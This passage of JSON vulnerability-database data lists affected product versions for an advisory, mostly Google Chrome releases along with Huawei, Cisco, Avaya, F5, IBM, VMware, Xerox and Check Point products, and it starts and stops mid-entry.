"vendor": "google", "version": "13.0.782.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.903.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.733.0" }, { "model": "gaia r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "t610 plus flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.749.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.0" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.12" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.72" }, { "model": "secureplatform r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.813.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.7" }, { "model": "oceanstor dorado5100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.211" }, { "model": "oceanstor s2600t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.673.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.187" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.383.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.790.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.319" }, { "model": "esight uc\u0026c v100r001c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.1" }, { "model": "vcenter server appliance patch", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.8" }, { "model": "fusionmanager v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "secureplatform r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.932.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.101" }, { "model": "oceanstor s6800t v100r005c30", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1064.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.0" }, { "model": "power hmc r7.8.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1651.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.6" }, { "model": "espace u2990 v200r001c10spc102", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.391.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.107" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.18" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "ios-xe for catalyst air-ct5760", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual pgw softswitch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "22000" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.2" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.81" }, { "model": "prime network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.755.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1031" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.18" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "elog v100r003c01spc506", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1007.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.326.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.11" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.23" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1010" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.113" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.337" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.28" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.29" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78000" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.37" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1051" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.98" }, { "model": "oceanstor s5500t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "secureplatform r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.896.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.59" }, { "model": "secureplatform r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "secureplatform r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "socialcast on premise", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "e6000 blade server bh620 v100r002c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.417.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.334" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.657.0" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.0" }, { "model": "isoc v200r001c02spc203", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1049" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7242" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.331" }, { "model": "secureplatform r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.4" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9393" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1057" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.55" }, { "model": "qradar incident forensics mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.0" }, { "model": "gtsoftx3000 v200r001c01spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.390.0" }, { "model": "rack server rh2485 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1655.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.707.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.76" }, { "model": "secureplatform r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "gaia r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "algo one managed data service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1011.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1067.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.1" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "oceanstor vis6600 v100r002c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.801.0" }, { "model": "nexus running nxos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "horizon workspace", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1048.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.807.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.865.0" }, { "model": "espace cad v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.481.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.489.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.9" }, { "model": "vcenter converter standalone", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.55" }, { "model": "ipso r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.97" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "elog v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.69" }, { "model": "enterprise content delivery service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.50" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.510" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.96" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77750" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.572.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "ipso r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.786.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.20" }, { "model": "virtualization performance viewer", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.59" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1039.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.836.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.23" }, { "model": "oceanstor dorado2100 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.1" }, { "model": "ace 